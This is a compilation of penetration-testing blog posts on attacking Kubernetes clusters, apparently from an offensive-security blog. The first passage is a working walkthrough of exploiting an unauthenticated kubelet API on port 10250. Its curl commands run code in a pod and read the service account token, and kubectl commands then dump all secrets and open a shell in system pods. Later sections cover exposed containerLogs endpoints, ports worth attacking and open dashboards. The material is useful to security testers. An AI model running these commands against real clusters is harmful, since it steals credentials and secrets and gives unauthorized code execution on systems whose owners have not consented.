Nov  9 17:00 tmpdrwxr-xr-x    7 root     root          4096 Nov  9 16:27 usrdrwxr-xr-x    1 root     root          4096 Nov  9 16:27 varCheck the env and see if the kublet tokens are in the environment variables. depending on the cloud provider or hosting provider they are sometimes right there. Otherwise we need to retrieve them from:1. the mounted folder2. the cloud metadata urlCheck the env with the following command:curl -k -XPOST "https://k8-node:10250/run/kube-system/kube-dns-5b1234c4d5-4321/dnsmasq" -d "cmd=env"We are looking for the KUBLET_CERT, KUBLET_KEY, & CA_CERT environment variables.We are also looking for the kubernetes API server. This is most likely NOT the host you are messing with on 10250. We are looking for something like:KUBERNETES_PORT=tcp://10.10.10.10:443orKUBERNETES_MASTER_NAME: 10.11.12.13:443Once we get the kubernetes tokens or keys we need to talk to the API server to use them. The kublet (10250) wont know what to do with them.  This may be (if we are lucky) another public IP or a 10. IP.  If it’s a 10. IP we need to download kubectl to the pod.Assuming it’s not in the environment variables let’s look and see if they are there in the mounted secretscurl -k -XPOST "https://k8-node:10250/run/kube-system/kube-dns-5b1234c4d5-4321/dnsmasq" -d "cmd=mount"sample output truncated:cgroup on /sys/fs/cgroup/devices type cgroup (ro,nosuid,nodev,noexec,relatime,devices)mqueue on /dev/mqueue type mqueue (rw,nosuid,nodev,noexec,relatime)/dev/sda1 on /dev/termination-log type ext4 (rw,relatime,commit=30,data=ordered)/dev/sda1 on /etc/k8s/dns/dnsmasq-nanny type ext4 (rw,relatime,commit=30,data=ordered)tmpfs on /var/run/secrets/kubernetes.io/serviceaccount type tmpfs (ro,relatime)/dev/sda1 on /etc/resolv.conf type ext4 (rw,nosuid,nodev,relatime,commit=30,data=ordered)/dev/sda1 on /etc/hostname type ext4 (rw,nosuid,nodev,relatime,commit=30,data=ordered)/dev/sda1 on /etc/hosts type ext4 (rw,relatime,commit=30,data=ordered)shm on /dev/shm type tmpfs (rw,nosuid,nodev,noexec,relatime,size=65536k)We can then cat out the ca.cert, namespace, and tokencurl -k -XPOST "https://k8-node:10250/run/kube-system/kube-dns-5b1234c4d5-4321/dnsmasq" -d "cmd=ls -la /var/run/secrets/kubernetes.io/serviceaccount"Output:total 4drwxrwxrwt    3 root     root         140 Nov  9 16:27 .drwxr-xr-x    3 root     root        4.0K Nov  9 16:27 ..lrwxrwxrwx    1 root     root          13 Nov  9 16:27 ca.crt -> ..data/ca.crtlrwxrwxrwx    1 root     root          16 Nov  9 16:27 namespace -> ..data/namespacelrwxrwxrwx    1 root     root          12 Nov  9 16:27 token -> ..data/tokenand then:curl -k -XPOST "https://k8-node:10250/run/kube-system/kube-dns-5b1234c4d5-4321/dnsmasq" -d "cmd=cat /var/run/secrets/kubernetes.io/serviceaccount/token"output:eyJhbGciOiJSUzI1NiI—SNIP—Also grab the ca.crt :-)With the token, ca.crt and api server IP address we can issue commands with kubectl.$ kubectl –server=https://1.2.3.4 –certificate-authority=ca.crt –token=eyJhbGciOiJSUzI1NiI—SNIP— get pods –all-namespacesOutput:NAMESPACE     NAME                                                            READY     STATUS    RESTARTS   AGEkube-system   event-exporter-v0.1.9-5c-SNIP                          2/2       Running   2          120dkube-system   fluentd-cloud-logging-gke-eeme-api-default-pool   1/1       Running   1          2ykube-system   heapster-v1.5.2-5-SNIP                              3/3       Running   0          27dkube-system   kube-dns-5b8-SNIP                                       4/4       Running   0          61dkube-system   kube-dns-autoscaler-2-SNIP                             1/1       Running   1          252dkube-system   kube-proxy-gke-eeme-api-default-pool              1/1       Running   1          2y kube-system   kubernetes-dashboard-7-SNIP                           1/1       Running   0          27dkube-system   l7-default-backend-10-SNIP                            1/1       Running   0          27dkube-system   metrics-server-v0.2.1-7-SNIP                         2/2       Running   0          120dat this point you can pull secrets or exec into any available pods$ kubectl –server=https://1.2.3.4 –certificate-authority=ca.crt –token=eyJhbGciOiJSUzI1NiI—SNIP— get secrets –all-namespacesto get a shell via kubectl$ kubectl –server=https://1.2.3.4 –certificate-authority=ca.crt –token=eyJhbGciOiJSUzI1NiI—SNIP— get pods –namespace=kube-systemNAME                                                            READY     STATUS    RESTARTS   AGEevent-exporter-v0.1.9-5-SNIP               2/2       Running   2          120d–SNIP–metrics-server-v0.2.1-7f8ee58c8f-ab13f     2/2       Running   0          120d$ kubectl exec -it metrics-server-v0.2.1-7f8ee58c8f-ab13f –namespace=kube-system–server=https://1.2.3.4  –certificate-authority=ca.crt –token=eyJhbGciOiJSUzI1NiI—SNIP— /bin/sh/ # ls -lahtotal 40220drwxr-xr-x    1 root     root        4.0K Sep 11 07:25 .drwxr-xr-x    1 root     root        4.0K Sep 11 07:25 ..-rwxr-xr-x    1 root     root           0 Sep 11 07:25 .dockerenvdrwxr-xr-x    3 root     root        4.0K Sep 11 07:25 apiserver.local.configdrwxr-xr-x    2 root     root       12.0K Sep 11 07:24 bindrwxr-xr-x    5 root     root         380 Sep 11 07:25 devdrwxr-xr-x    1 root     root        4.0K Sep 11 07:25 etcdrwxr-xr-x    2 nobody   nogroup     4.0K Nov  1  2017 home-rwxr-xr-x    2 root     root       39.2M Dec 20  2017 metrics-serverdr-xr-xr-x  135 root     root           0 Sep 11 07:25 procdrwxr-xr-x    1 root     root        4.0K Dec 19 21:33 rootdr-xr-xr-x   12 root     root           0 Dec 19 19:06 sysdrwxrwxrwt    1 root     root        4.0K Oct 18 13:57 tmpdrwxr-xr-x    3 root     root        4.0K Sep 11 07:24 usrdrwxr-xr-x    1 root     root        4.0K Sep 11 07:25 varFor completeness if you got the keys via the environment variables the kubectl command would be something like this:kubectl –server=https://1.2.3.4 –certificate-authority=ca.crt –client-key=kublet.key –client-certificate=kublet.crt get pods –all-namespaces

Link: http://carnal0wnage.attackresearch.com/2019/01/kubernetes-unauth-kublet-api-10250_16.html

Kubernetes: List of ports

Other Kubernetes portsWhat are some of the visible ports used in Kubernetes?44134/tcp – Helmtiller, weave, calico10250/tcp – kubelet (kublet exploit)No authN, completely open/pods/runningpods/containerLogs10255/tcp – kublet port (read-only)/stats/metrics/pods4194/tcp – cAdvisor2379/tcp – etcd (see it on other ports though)Etcd holds all the configsConfig storage30000 – dashboard443/6443 – api

Link: http://carnal0wnage.attackresearch.com/2019/01/kubernetes-list-of-ports.html

Kubernetes: Kubelet API containerLogs endpoint

How to get the info that kube-hunter reports for open /containerLogs endpointVulnerabilities+—————+————-+——————+———————-+—————-+| LOCATION       CATEGORY     | VULNERABILITY    | DESCRIPTION          | EVIDENCE       |+—————+————-+——————+———————-+—————-++—————-+————+——————+———————-+—————-+| 1.2.3.4:10250 | Information | Exposed Container| Output logs from a   |                ||               | Disclosure  | Logs             | running container    |                ||               |             |                  | are using the        |                ||               |             |                  | exposed              |                ||               |             |                  | /containerLogs       |                ||               |             |                  | endpoint             |                |+—————+————-+——————+———————-+—————-+First step, grab the output from /runningpods/ example below:You’ll need the namespace, pod name and container name.Thus given the below runningpods output:{“metadata":{"name":"monitoring-influxdb-grafana-v4-6679c46745-zhvjw","namespace":"kube-system","uid":"0d22cdad-06e5-11e9-a7f3-6ac885fbc092","creationTimestamp":null},"spec":{"containers":[{"name":"grafana","image":"sha256:8cb3de219af7bdf0b3ae66439aecccf94cebabb230171fa4b24d66d4a786f4f7","resources":{}},{"name":"influxdb","image":"sha256:577260d221dbb1be2d83447402d0d7c5e15501a89b0e2cc1961f0b24ed56c77c","resources":{}}]},turns into:https://1.2.3.4:10250/containerLogs/kube-system/monitoring-influxdb-grafana-v4-6679c46745-zhvjw/grafanaandhttps://1.2.3.4:10250/containerLogs/kube-system/monitoring-influxdb-grafana-v4-6679c46745-zhvjw/influxdb

Link: http://carnal0wnage.attackresearch.com/2019/01/kubernetes-kubelet-api-containerlogs.html

Kubernetes: Kubernetes Dashboard

Tesla was famously hacked for leaving this open and it’s pretty rare to find it exposed externally now but useful to know what it is and what you can do with it.Usually found on port 30000kube-hunter finding for it:Vulnerabilities+———————–+—————+———————-+———————-+——————+| LOCATION              | CATEGORY      | VULNERABILITY        | DESCRIPTION          | EVIDENCE         |+———————–+—————+———————-+———————-+——————+| 1.2.3.4:30000         | Remote Code   | Dashboard Exposed    | All oprations on the | nodes: pach-okta ||                       | Execution     |                      | cluster are exposed  |                  |+———————–+—————+———————-+———————-+——————+Why do you care?  It has access to all pods and secrets within the cluster. So rather than using command line tools to get secrets or run code you can just do it in a web browser.Screenshots of what it looks like:viewing secretsutilizationlogsshells

Link: http://carnal0wnage.attackresearch.com/2019/01/kubernetes-kubernetes-dashboard.html